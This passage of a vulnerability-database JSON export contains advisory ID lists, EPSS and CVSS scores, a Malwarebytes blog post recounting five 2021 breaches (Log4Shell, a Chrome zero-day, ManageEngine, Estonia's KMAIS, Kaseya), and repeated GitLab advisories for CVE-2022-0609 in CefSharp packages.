"THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "THREATPOST:78327DA051387C43A61D82DE6B618D1F", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:91A97EE2BD6933FEB9A07162BD4ED8B5", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046", "UB:CVE-2022-0609"]}, {"type": "veracode", "idList": ["VERACODE:33244", "VERACODE:33337", "VERACODE:33348", "VERACODE:34289"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdt", "idList": ["1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37889"]}]}, "epss": [{"cve": "CVE-2021-44228", "epss": "0.975780000", "percentile": "0.999980000", "modified": "2023-03-19"}, {"cve": "CVE-2022-0609", "epss": "0.003030000", "percentile": "0.649400000", "modified": "2023-03-19"}], "vulnersScore": -0.6}, "_state": {"dependencies": 1659988328, "score": 1698844884, "epss": 1679287104}, "_internal": {"score_hash": "7b7890a1e1026fb122426d5b75ecf492"}}

{"malwarebytes": [{"lastseen": "2022-06-21T11:57:15", "description": "Businesses and governments these days are relying on dozens of different Software-as-a-Service (SaaS) applications to run their operations \u2014 and it\u2019s no secret that hackers are always looking for security vulnerabilities in them to exploit.\n\nAccording to [research by BetterCloud](<http://pages.bettercloud.com/rs/719-KZY-706/images/2020_StateofSaaSOpsReport.pdf?mkt_tok=NzE5LUtaWS03MDYAAAF8LQdmoC7u54xbqxNwp0au4Zk7SiYaaqq2vupXFxCvaP5vY8gSQtlGFsUsRI8oj5Fl2m5PwIZUUAlzVZL_-hUEQ2RdNqgEzDAmZA5bZtowS_v-zMs>), the average company with 500 to 999 employees uses about 93 different SaaS applications, with that number rising to 177 for companies with over 1000 employees.\n\nCoupled with the fact that vendors release thousands of updates each year to patch security vulnerabilities in their software, it\u2019s not surprising that businesses and governments are struggling to keep up with the [volume of security vulnerabilities and patches](<https://media.bitpipe.com/io_15x/io_152272/item_2184126/ponemon-state-of-vulnerability-response-.pdf>).\n\nAnd lo and behold, despite the best efforts of governments and businesses around the globe, hackers still managed to exploit [multiple security vulnerabilities in 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>).\n\nIn this post, we\u2019ll take a look at five times governments and businesses got hacked thanks to security vulnerabilities in 2021.\n\n## 1\\. APT41 exploits Log4Shell vulnerability to compromise at least two US state governments\n\nFirst publicly announced in early December 2021, [Log4shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/what-smbs-can-do-to-protect-against-log4shell-attacks/>) ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)) is a critical security vulnerability in the popular Java library Apache Log4j 2. The vulnerability is simple to execute and enables attackers to perform [remote code execution](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>).\n\nA patch for Log4Shell was released on 9 December 2021, but within hours of the initial December 10 2021 announcement, hacker groups were already racing to exploit Log4Shell before businesses and governments could patch it \u2014 and at least one of them was successful.\n\nShortly after the advisory, the Chinese state-sponsored hacking group APT41 exploited Log4Shell to compromise at least two US state governments, according to research from [Mandiant](<https://www.mandiant.com/resources/apt41-us-state-governments>). Once they gained access to internet-facing systems, APT41 began a months-long campaign of [reconnaissance ](<https://blog.malwarebytes.com/glossary/recon/>)and credential harvesting.\n\n## 2. North Korean government backed-groups exploit Chrome zero-day vulnerability\n\nOn February 10 2022, Google&#x27;s Threat Analysis Group (TAG) [discovered that two North Korean government backed-groups ](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-chrome-patches-actively-exploited-zero-day-vulnerability/>)exploited a vulnerability ([**CVE-2022-0609**](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>)) in Chrome to attack over 250 individuals working for various media, fintech, and software companies.\n\nThe activities of the two groups have been tracked as [Operation Dream Job](<https://www.clearskysec.com/operation-dream-job/>) and[ AppleJeus](<https://securelist.com/operation-applejeus/87553/>), and both of them used the same [exploit kit](<https://blog.malwarebytes.com/threats/exploit-kits/>) to collect sensitive information from affected systems.\n\nHow does it work, you ask? Well, hackers exploited a use-after-free (UAF) vulnerability in the Animation component of Chrome \u2014 which, just like Log4Shell, allows hackers to perform remote code execution.\n\n## 3. Hackers infiltrate governments and companies with ManageEngine ADSelfService Plus vulnerability\n\nFrom September 17 through early October, hackers successfully compromised at least nine companies and 370 servers by[ exploiting a vulnerability** **](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>)[**(CVE-20**](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)**[2](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)**[**1-40539)**](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)[ in ManageEngine ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>), a self-service password management and single sign-on solution.\n\nSo, what happens after hackers exploited this vulnerability? You guessed it \u2014 remote code execution. Specifically, hackers uploaded a [payl](<https://blog.malwarebytes.com/glossary/payload/>)[oad ](<https://blog.malwarebytes.com/glossary/payload/.>)to a victims network that installed a webshell, a malicious script that grants hackers a persistent gateway to the affected device.\n\nFrom there, hackers [moved laterally](<https://blog.malwarebytes.com/glossary/lateral-movement/>) to other systems on the network, exfiltrated any files they pleased, and [even stole credentials](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>).\n\n## 4. Tallinn-based hacker exploits Estonian government platform security vulnerabilities\n\n[In July 2021](<https://www.ria.ee/en/news/police-and-border-guard-board-and-information-system-authority-stopped-illegal-downloading-data.html>), Estonian officials announced that a Tallinn-based male had gained access to KMAIS, Estonia\u2019s ID-document database, where he downloaded the government ID photos of 286,438 Estonians.\n\nTo do this, the hacker exploited a vulnerability in KMAIS that allowed him to obtain a person&#x27;s ID photo using queries. Specifically, KMAIS did not sufficiently check the validity of the query received \u2014 and so, using fake digital certificates, the suspect could download the photograph of whoever he was pretending to be.\n\n## 5. Russian hackers exploit Kaseya security vulnerabilities\n\nKaseya, a Miami-based software company, provides tech services to thousands of businesses over the world \u2014 and on July 2 2021, Kaseya CEO Fred Voccola had an urgent message for Kaseya customers: [shut down your servers immediately](<https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/>).\n\nThe urgency was warranted. [Over 1,500 small and midsize businesses](<https://blog.malwarebytes.com/cybercrime/2021/07/shutdown-kaseya-vsa-servers-now-amidst-cascading-revil-attack-against-msps-clients/>) had just been attacked, with attackers asking for $70 million in payment.\n\nA Russian-based cybergang known as REvil claimed responsibility for the attack. According to Hunteress Labs, REvil [exploi](<https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>)[ted a zero-day](<https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) ([CVE-](<https://nvd.nist.gov/vuln/detail/CVE-2021-30116>)[2021-30116](<https://nvd.nist.gov/vuln/detail/CVE-2021-30116>)) and performed an authentication bypass in Kaseya&#x27;s web interface \u2014 allowing them to deploy [a ransomware attack](<https://blog.malwarebytes.com/ransomware/2021/07/3-things-the-kaseya-attack-can-teach-us-about-ransomware-recovery/>) on MSPs and their customers.\n\n## Organizations need a streamlined approach to vulnerability assessment\n\n[Hackers took advantage](<https://blog.malwarebytes.com/hacking-2/2022/05/10-ways-attackers-gain-access-to-networks/>) of many security vulnerabilities in 2021 to breach an array of governments and businesses.\n\nAs we broke down in this article, hackers can range from individuals to whole state-sponsored groups \u2014 and we also saw how vulnerabilities themselves can appear in just about any piece of software regardless of the industry.\n\nAnd while some vulnerabilities are certainly worse than others, the sheer volume of vulnerabilities out there makes it difficult to keep up with the volume of security patches. With the right [vulnerability management](<https://www.malwarebytes.com/cybersecurity/business/what-is-vulnerability-management>) and[ patch management](<https://www.malwarebytes.com/cybersecurity/business/what-is-patch-management>), however, your organization can find (and correct) weak points that malicious hackers, viruses, and other cyberthreats want to attack.\n\nWant to learn more about different vulnerability and patch management tools? Visit our [Vulnerability and Patch Management page](<https://www.malwarebytes.com/business/vulnerability-patch-management>) or read the [solution brief](<https://www.malwarebytes.com/resources/easset_upload_file46277_212091_e.pdf>).\n\nThe post [Security vulnerabilities: 5 times that organizations got hacked](<https://blog.malwarebytes.com/business-2/2022/06/security-vulnerabilities-5-times-that-organizations-got-hacked/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-21T10:04:02", "type": "malwarebytes", "title": "Security vulnerabilities: 5 times that organizations got hacked", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-0609"], "modified": "2022-06-21T10:04:02", "id": "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "href": "https://blog.malwarebytes.com/business-2/2022/06/security-vulnerabilities-5-times-that-organizations-got-hacked/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gitlab": [{"lastseen": "2023-10-19T16:06:06", "description": "The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction. Technical details are unknown but an exploit is available.\n\nThere is currently little other public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "gitlab", "title": "Use after free in Animation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-22T00:00:00", "id": "GITLAB-BE424589ED0C337DD3884B216A3892B2", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.Common%2FGMS-2022-140.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-17T15:47:18", "description": "The exploitation is known to be easy. The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction. Technical details are unknown but an exploit is available.\n\nThere is currently little other public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "gitlab", "title": "Use after free in Animation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-22T00:00:00", "id": "GITLAB-5276A663FE45AAB11A41593871966211", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.OffScreen%2FGMS-2022-142.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T23:09:31", "description": "Use after free in Animation. The exploitation is known to be easy. The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction. Technical details are unknown but an exploit is available.\n\nThere is currently little other public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "gitlab", "title": "Use after free in Animation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-22T00:00:00", "id": "GITLAB-34BA340EEEB0AC5BD42079A6FA2C932A", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.Wpf%2FGMS-2022-146.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-29T15:16:59", "description": "The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction. Technical details are unknown but an exploit is available.\n\nThere is currently little other public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "gitlab", "title": "Use after free in Animation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-22T00:00:00", "id": "GITLAB-14506204EDDBCC426EDE99AF8BB58E00", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.WinForms.NETCore%2FGMS-2022-145.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T16:18:42", "description": "The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction. Technical details are unknown but an exploit is available.\n\nThere is currently little other public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "gitlab", "title": "Use after free in Animation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-22T00:00:00", "id": "GITLAB-FF3BD63BDD01DCAB69F73F5C67C8E8D9", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.Common.NETCore%2FGMS-2022-141.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T23:08:45", "description": "The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction. Technical details are unknown but an exploit is available.\n\nThere is currently little other public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "gitlab", "title": "Use after free in Animation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-22T00:00:00", "id": "GITLAB-5C55E4CE507C85E21B1AFFF594C436B8", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.Wpf.HwndHost%2FGMS-2022-147.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-24T15:16:40", "description": "The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction. Technical details are unknown but an exploit is available.\n\nThere is currently little other public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "gitlab", "title": "Use after free in Animation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-22T00:00:00", "id": "GITLAB-B95DA60B50B8780F2FE1144BC6D2A9EA", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.WinForms%2FGMS-2022-144.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T23:09:03", "description": "Use after free in Animation. The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction. Technical details are unknown but an exploit is available.\n\nThere is currently little other public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 